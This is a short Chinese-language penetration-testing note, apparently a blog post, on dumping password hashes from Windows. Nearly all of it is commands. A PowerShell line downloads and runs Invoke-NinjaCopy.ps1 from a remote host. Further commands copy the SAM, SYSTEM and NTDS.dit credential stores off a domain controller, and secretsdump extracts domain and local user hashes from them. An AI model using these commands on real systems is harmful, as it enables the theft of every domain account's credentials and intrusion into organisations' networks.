从NTDS.dit获取密码hash

获取NTDS.dit

加载ps脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1");

提取本地sam文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam

提取域控NTDS.dit
Invoke-NinjaCopy -Path C:\Windows\NTDS\ntds.dit -LocalDestination C:\Users\Administrator\Desktop\ntds.dit

提取hive文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination C:\Users\Administrator\Desktop\SYSTEM


提取hash

secretsdump.exe -ntds ntds.dit -system SYSTEM LOCAL  #提取域控用户hash
secretsdump.exe -sam sam -system SYSTEM LOCAL		#提取本地用户hash

从NTDS.dit获取密码hash_第1张图片
运气好可以直接得到秘密
从NTDS.dit获取密码hash_第2张图片

你可能感兴趣的:(渗透测试)